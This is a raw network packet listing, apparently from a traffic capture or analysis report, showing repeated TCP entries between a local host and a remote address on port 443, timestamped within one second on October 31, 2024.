                                                                                                                                                                                                  Oct 31, 2024 18:05:25.166142941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.166204929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.166235924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.166349888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.166841030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.166883945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167041063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167042017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167042017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167042017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167102098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167150021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.167150021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.169727087 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.169789076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.169958115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.169959068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.170017004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.170038939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.170038939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.171725988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.171782017 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.171955109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.171956062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.172023058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.172045946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.172045946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.176359892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.176424980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.176610947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.176610947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.176668882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.176690102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178297043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178349972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178507090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178561926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178586960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178586960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.178643942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.179857016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.179919958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.180078030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.180131912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.180147886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.180202961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.181895971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.181948900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.182118893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.182120085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.182120085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.182120085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.182179928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.182208061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183043957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183105946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183331013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183331966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183387995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.183409929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.185997963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186049938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186220884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186220884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186275959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186300039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.186300039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190553904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190615892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190836906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190836906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190896034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.190916061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192667961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192720890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192883015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192938089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.192954063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.193007946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196480036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196543932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196707964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196762085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.196783066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198297977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198350906 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198522091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198522091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198576927 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198599100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198599100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.198662043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199054956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199115992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199306011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199306011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199306011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199362993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.199389935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212349892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212402105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212616920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212616920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212675095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.212696075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214467049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214530945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214675903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214737892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214764118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.214764118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223436117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223490000 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223644018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223644018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223704100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223733902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.223818064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228050947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228116035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228229046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228229046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228291988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228318930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228318930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.228404045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230127096 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230180979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230359077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230359077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230412960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.230437994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231367111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231431007 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231589079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231589079 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231653929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231703043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231703043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.231703043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233628035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233685970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233820915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233885050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233907938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.233907938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.234003067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.236840963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.236906052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237062931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237117052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237133026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.237238884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276727915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276781082 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276984930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276984930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.276985884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.277045012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.277070045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283631086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283694029 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283849001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283849955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283906937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283945084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283945084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.283945084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.315800905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.315813065 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.315996885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.315996885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.316010952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.316020966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.316021919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.316075087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331124067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331137896 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331348896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331348896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331362963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331372023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.331423044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.332807064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.332818985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.333002090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.333002090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.333015919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.333024979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.333024979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.333112955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.334897041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.334911108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335067987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335068941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335081100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335091114 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335091114 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335165977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.335227013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.336977005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.336987972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.337162018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.337240934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.337253094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.337260962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340357065 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340368986 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340570927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340570927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340584040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340599060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.340701103 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.341983080 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.341991901 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342154026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342154026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342166901 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342176914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342176914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342222929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.342272997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.344990969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.345001936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.345200062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.345212936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.345212936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.345221043 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.345288992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.347721100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.347733021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.347954035 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.347968102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.348027945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.348027945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349085093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349095106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349291086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349291086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349303961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349313021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349389076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.349389076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350126028 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350136995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350296021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350296021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350308895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350317955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350317955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350389957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.350444078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353291035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353301048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353499889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353499889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353513002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353522062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353596926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.353596926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354077101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354089022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354243994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354243994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354259968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354269981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354345083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354345083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.354399920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358153105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358163118 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358362913 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358362913 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358376026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358388901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358603001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.358603001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.360625029 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.360636950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.360858917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.360858917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.360872030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:25.360881090 CET49755443192.168.11.2054.37.62.77
